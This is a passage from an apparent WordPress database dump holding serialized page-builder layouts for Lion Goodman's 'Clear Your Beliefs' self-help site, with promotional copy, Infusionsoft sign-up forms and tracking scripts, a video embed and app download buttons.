Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1386, 1827, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1219:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1091, 1581, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:698:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about</strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs Permanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1379:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Finally release pain and hurts from the past</li>\n	<li>Clear resistance that stops you from taking action</li>\n	<li>Open yourself to new possibilities of love, work and success</li>\n	<li>Eliminate the blocks that prevent you from getting what you want</li>\n	<li>Find your true purpose and express your true magnificence</li>\n	<li>Permanently delete whatever’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1093, 1583, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:692:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nInterfere with Your Relationships,\nor Prevent You from Living the Life You Want</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1379:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Finally release pain and hurts from the past</li>\n	<li>Clear resistance that stops you from taking action</li>\n	<li>Open yourself to new possibilities of love, work and success</li>\n	<li>Eliminate the blocks that prevent you from getting what you want</li>\n	<li>Find your true purpose and express your true magnificence</li>\n	<li>Permanently delete whatever’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the 